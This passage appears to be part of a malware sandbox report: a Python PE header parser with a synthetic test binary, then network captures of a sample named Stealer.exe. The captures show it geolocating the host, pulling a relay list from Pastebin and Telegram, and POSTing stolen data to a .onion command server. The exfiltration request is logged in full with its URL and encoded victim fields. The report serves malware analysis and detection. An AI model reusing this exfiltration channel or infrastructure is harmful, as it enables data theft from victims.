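                 (0x20000000, "IMAGE_SCN_MEM_EXECUTE"), (0x40000000, "IMAGE_SCN_MEM_READ"),
                 (0x80000000, "IMAGE_SCN_MEM_WRITE")]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0..8), the measure behind the report's Entropy column."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe(blob: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    dir_off = opt + {0x10B: 96, 0x20B: 112}[magic]          # PE32 / PE32+ directory offset
    ndirs = struct.unpack_from("<I", blob, dir_off - 4)[0]  # NumberOfRvaAndSizes
    dirs = {}
    for i in range(min(ndirs, 16)):
        dirs[DIRECTORY_NAMES[i]] = struct.unpack_from("<II", blob, dir_off + 8 * i)
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": rawsize,
            "entropy": shannon_entropy(blob[rawptr:rawptr + rawsize]),
            "flags": [n for bit, n in SECTION_FLAGS if chars & bit],
        })
    return {"directories": dirs, "sections": sections}


def rva_to_section(pe: dict, rva: int):
    """Name of the section containing an RVA, as in the 'Is in Section' column."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def directory_table(pe: dict):
    """(name, rva, size, section-or-None) rows, mirroring the report's table."""
    return [(name, rva, size, rva_to_section(pe, rva) if rva else None)
            for name, (rva, size) in pe["directories"].items()]


def is_dotnet(pe: dict) -> bool:
    """A populated COM_DESCRIPTOR (CLR header) directory marks a managed assembly."""
    rva, size = pe["directories"].get("COM_DESCRIPTOR", (0, 0))
    return rva != 0 and size != 0


def build_fixture() -> bytes:
    """Constructed minimal PE32 (NOT the analysed sample): directory and section RVAs
    copy the report; linker fields, entry point and raw section bytes are synthetic."""
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2], dirs[5] = (0x55384, 0x57), (0x56000, 0x612), (0x58000, 0xC)
    dirs[12], dirs[14] = (0x2000, 0x8), (0x2008, 0x48)
    secs = [(b".text", 0x533E4, 0x2000, 0x200, 0x200, 0x60000020),
            (b".rsrc", 0x612, 0x56000, 0x200, 0x400, 0x40000040),
            (b".reloc", 0xC, 0x58000, 0x200, 0x600, 0x42000040)]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 96 + 16 * 8, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 48, 0, 0x53400, 0xA00, 0, 0x2000, 0x2000, 0x56000,
                      0x400000, 0x2000, 0x200, 4, 0, 0, 0, 4, 0,
                      0, 0x5A000, 0x200, 0, 2, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    hdr = dos + b"PE\0\0" + coff + opt
    for name, vsize, va, rawsize, rawptr, chars in secs:
        hdr += struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)
    text = bytes(i * 37 % 256 for i in range(0x200))   # every byte value twice -> entropy 8.0
    rsrc = b"synthetic resource bytes".ljust(0x200, b"\0")
    reloc = b"\0" * 0x200                                # all zeros -> entropy 0.0
    return hdr.ljust(0x200, b"\0") + text + rsrc + reloc


if __name__ == "__main__":
    pe = parse_pe(build_fixture())
    for name, rva, size, sec in directory_table(pe):
        print(f"{name:<15} 0x{rva:<7x} 0x{size:<5x} {sec or ''}")
    for s in pe["sections"]:
        print(f"{s['name']:<7} va=0x{s['va']:x} entropy={s['entropy']:.3f} {', '.join(s['flags'])}")
    print(".NET assembly:", is_dotnet(pe))
```

The .NET check is worth keeping separate from the import check: a managed binary always carries the CLR header, whereas the mscoree.dll import stub can be stripped or replaced by packers.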
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 10:30:47.210452080 CET | 49163 | 80 | 192.168.2.22 | 208.95.112.1
Mar 29, 2024 10:30:47.304770947 CET | 80 | 49163 | 208.95.112.1 | 192.168.2.22
Mar 29, 2024 10:30:47.304857969 CET | 49163 | 80 | 192.168.2.22 | 208.95.112.1
Mar 29, 2024 10:30:47.307265043 CET | 49163 | 80 | 192.168.2.22 | 208.95.112.1
Mar 29, 2024 10:30:47.403111935 CET | 80 | 49163 | 208.95.112.1 | 192.168.2.22
Mar 29, 2024 10:30:47.603485107 CET | 49163 | 80 | 192.168.2.22 | 208.95.112.1
Mar 29, 2024 10:30:49.160450935 CET | 49163 | 80 | 192.168.2.22 | 208.95.112.1
Mar 29, 2024 10:30:49.254760027 CET | 80 | 49163 | 208.95.112.1 | 192.168.2.22
Mar 29, 2024 10:30:49.257376909 CET | 49163 | 80 | 192.168.2.22 | 208.95.112.1
Mar 29, 2024 10:30:49.377945900 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:49.377978086 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:49.378061056 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:49.483197927 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:49.483233929 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:49.861136913 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:49.861210108 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:49.866909027 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:49.866916895 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:49.867309093 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:49.946604967 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:49.992238045 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:50.229649067 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:50.229701996 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:50.229712009 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:50.229741096 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:50.229762077 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:50.229767084 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:50.229792118 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:50.229808092 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:50.229855061 CET | 443 | 49164 | 149.154.167.99 | 192.168.2.22
Mar 29, 2024 10:30:50.229911089 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:50.230161905 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:50.232543945 CET | 49164 | 443 | 192.168.2.22 | 149.154.167.99
Mar 29, 2024 10:30:50.466140985 CET | 49165 | 443 | 192.168.2.22 | 172.67.34.170
Mar 29, 2024 10:30:50.466178894 CET | 443 | 49165 | 172.67.34.170 | 192.168.2.22
Mar 29, 2024 10:30:50.466248989 CET | 49165 | 443 | 192.168.2.22 | 172.67.34.170
Mar 29, 2024 10:30:50.466836929 CET | 49165 | 443 | 192.168.2.22 | 172.67.34.170
Mar 29, 2024 10:30:50.466850042 CET | 443 | 49165 | 172.67.34.170 | 192.168.2.22
Mar 29, 2024 10:30:50.666232109 CET | 443 | 49165 | 172.67.34.170 | 192.168.2.22
Mar 29, 2024 10:30:50.666316032 CET | 49165 | 443 | 192.168.2.22 | 172.67.34.170
Mar 29, 2024 10:30:50.672126055 CET | 49165 | 443 | 192.168.2.22 | 172.67.34.170
Mar 29, 2024 10:30:50.672136068 CET | 443 | 49165 | 172.67.34.170 | 192.168.2.22
Mar 29, 2024 10:30:50.672432899 CET | 443 | 49165 | 172.67.34.170 | 192.168.2.22
Mar 29, 2024 10:30:50.682517052 CET | 49165 | 443 | 192.168.2.22 | 172.67.34.170
Mar 29, 2024 10:30:50.724236012 CET | 443 | 49165 | 172.67.34.170 | 192.168.2.22
Mar 29, 2024 10:30:51.342000961 CET | 443 | 49165 | 172.67.34.170 | 192.168.2.22
Mar 29, 2024 10:30:51.342128038 CET | 443 | 49165 | 172.67.34.170 | 192.168.2.22
Mar 29, 2024 10:30:51.342597008 CET | 49165 | 443 | 192.168.2.22 | 172.67.34.170
Mar 29, 2024 10:30:51.343908072 CET | 49165 | 443 | 192.168.2.22 | 172.67.34.170
Mar 29, 2024 10:30:51.357322931 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:30:51.541559935 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:30:51.541632891 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:30:51.541835070 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:30:51.724695921 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:30:51.724992990 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:30:51.725244045 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:30:51.948698044 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:40.005934000 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:40.006102085 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:40.189251900 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:40.726600885 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:40.726865053 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:40.909914017 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:40.910185099 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.093233109 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.093571901 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.276586056 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.276614904 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.276627064 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.276861906 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.277498960 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.277509928 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.277543068 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.277566910 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.277610064 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.277642965 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.277642965 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.460103989 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460150957 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460156918 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460161924 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460166931 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460171938 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460318089 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460350037 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460479021 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.460556030 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.460623980 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.460644960 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.643723011 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.643747091 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.643774986 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.643785954 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.643806934 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.643863916 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.643863916 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.643906116 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.643953085 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:41.644222021 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.644361973 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.644480944 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.644610882 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.644669056 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.644798040 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.644809008 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.645052910 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.645064116 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.645128012 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.645190001 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.645200968 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.645235062 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.645404100 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.826833963 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.826848984 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.826859951 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.826942921 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.826953888 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.826963902 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.826996088 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827011108 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827035904 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827109098 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827157974 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827235937 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827275038 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827341080 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827356100 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827394009 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:41.827425957 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:47.469018936 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:47.469043016 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Mar 29, 2024 10:31:47.469258070 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:47.473097086 CET | 49166 | 9200 | 192.168.2.22 | 188.166.166.142
Mar 29, 2024 10:31:47.655802965 CET | 9200 | 49166 | 188.166.166.142 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 10:30:46.629488945 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Mar 29, 2024 10:30:46.744688034 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Mar 29, 2024 10:30:49.168119907 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Mar 29, 2024 10:30:49.270401955 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Mar 29, 2024 10:30:49.273977041 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Mar 29, 2024 10:30:49.376312017 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Mar 29, 2024 10:30:50.245299101 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Mar 29, 2024 10:30:50.355515957 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Mar 29, 2024 10:30:50.355808020 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Mar 29, 2024 10:30:50.461611032 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 29, 2024 10:30:46.629488945 CET | 192.168.2.22 | 8.8.8.8 | 0xd57b | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:49.168119907 CET | 192.168.2.22 | 8.8.8.8 | 0xf242 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:49.273977041 CET | 192.168.2.22 | 8.8.8.8 | 0xf242 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:50.245299101 CET | 192.168.2.22 | 8.8.8.8 | 0xcd5e | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:50.355808020 CET | 192.168.2.22 | 8.8.8.8 | 0xcd5e | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 29, 2024 10:30:46.744688034 CET | 8.8.8.8 | 192.168.2.22 | 0xd57b | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:49.270401955 CET | 8.8.8.8 | 192.168.2.22 | 0xf242 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:49.376312017 CET | 8.8.8.8 | 192.168.2.22 | 0xf242 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:50.355515957 CET | 8.8.8.8 | 192.168.2.22 | 0xcd5e | No error (0) | pastebin.com | | 172.67.34.170 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:50.355515957 CET | 8.8.8.8 | 192.168.2.22 | 0xcd5e | No error (0) | pastebin.com | | 104.20.68.143 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:50.355515957 CET | 8.8.8.8 | 192.168.2.22 | 0xcd5e | No error (0) | pastebin.com | | 104.20.67.143 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:50.461611032 CET | 8.8.8.8 | 192.168.2.22 | 0xcd5e | No error (0) | pastebin.com | | 172.67.34.170 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:50.461611032 CET | 8.8.8.8 | 192.168.2.22 | 0xcd5e | No error (0) | pastebin.com | | 104.20.68.143 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 10:30:50.461611032 CET | 8.8.8.8 | 192.168.2.22 | 0xcd5e | No error (0) | pastebin.com | | 104.20.67.143 | A (IP address) | IN (0x0001) | false
Contacted hosts
• t.me
• pastebin.com
• ip-api.com
• izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion (request headers: content-length: 110240; expect: 100-continue; connection: keep-alive)
HTTP session (ip-api.com geolocation lookup; note the request carries no User-Agent header)
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 208.95.112.1 | 80 | 2308 | C:\Users\user\Desktop\Stealer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 10:30:47.307265043 CET | 64 | OUT | GET /json HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Mar 29, 2024 10:30:47.403111935 CET | 486 | IN | HTTP/1.1 200 OK
                                                                            Date: Fri, 29 Mar 2024 09:30:47 GMT
                                                                            Content-Type: application/json; charset=utf-8
                                                                            Content-Length: 309
                                                                            Access-Control-Allow-Origin: *
                                                                            X-Ttl: 60
                                                                            X-Rl: 44
                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 43 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 22 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 22 7a 69 70 22 3a 22 35 36 39 37 32 22 2c 22 6c 61 74 22 3a 33 38 2e 38 39 34 2c 22 6c 6f 6e 22 3a 2d 37 37 2e 30 33 36 35 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 41 53 31 37 34 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 7d
                                                                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"DC","regionName":"District of Columbia","city":"Washington","zip":"56972","lat":38.894,"lon":-77.0365,"timezone":"America/New_York","isp":"AS174","org":"DET Africa (Pty) LTD","as":"AS174 Cogent Communications","query":"102.165.48.43"}


HTTP session (upload to the .onion C2 through the first gateway from the pastebin list; the Host header names the onion address while the TCP connection goes to 188.166.166.142:9200)
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49166 | 188.166.166.142 | 9200 | 2308 | C:\Users\user\Desktop\Stealer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 10:31:40.006102085 CET | 300 | OUT | POST /stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3 HTTP/1.1
Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion
Content-Length: 110240
Expect: 100-continue
Connection: Keep-Alive
Data Raw:
Data Ascii:
Mar 29, 2024 10:31:40.726600885 CET | 50 | IN | HTTP/1.1 100 Continue
Data Raw: 48 54 54 50 2f 31 2e 31 20 31 30 30 20 43 6f 6e 74 69 6e 75 65 0d 0a 0d 0a
Data Ascii: HTTP/1.1 100 Continue
Mar 29, 2024 10:31:47.469018936 CET | 174 | IN | HTTP/1.1 200 OK
                                                                            Server: Werkzeug/2.1.2 Python/3.11.0
                                                                            Date: Fri, 29 Mar 2024 09:31:46 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 2
                                                                            Connection: close
                                                                            Data Raw: 6f 6b
                                                                            Data Ascii: ok


HTTPS session (t.me/tor_proxies page)
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 149.154.167.99 | 443 | 2308 | C:\Users\user\Desktop\Stealer.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 09:30:49 UTC | 65 | OUT | GET /tor_proxies HTTP/1.1
Host: t.me
Connection: Keep-Alive
2024-03-29 09:30:50 UTC | 512 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Fri, 29 Mar 2024 09:30:50 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 10971
                                                                            Connection: close
                                                                            Set-Cookie: stel_ssid=5a68848a4a540c03a4_18393739983077253990; expires=Sat, 30 Mar 2024 09:30:50 GMT; path=/; samesite=None; secure; HttpOnly
                                                                            Pragma: no-cache
                                                                            Cache-control: no-store
                                                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                            Strict-Transport-Security: max-age=35768000
2024-03-29 09:30:50 UTC | 10971 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 74 6f 72 5f 70 72 6f 78 69 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @tor_proxies</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.p


HTTPS session (pastebin.com raw paste holding the gateway list)
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49165 | 172.67.34.170 | 443 | 2308 | C:\Users\user\Desktop\Stealer.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 09:30:50 UTC | 74 | OUT | GET /raw/X2Ddjiv0 HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-03-29 09:30:51 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                            Date: Fri, 29 Mar 2024 09:30:51 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-frame-options: DENY
                                                                            x-content-type-options: nosniff
                                                                            x-xss-protection: 1;mode=block
                                                                            cache-control: public, max-age=1801
                                                                            CF-Cache-Status: MISS
                                                                            Last-Modified: Fri, 29 Mar 2024 09:30:51 GMT
                                                                            Server: cloudflare
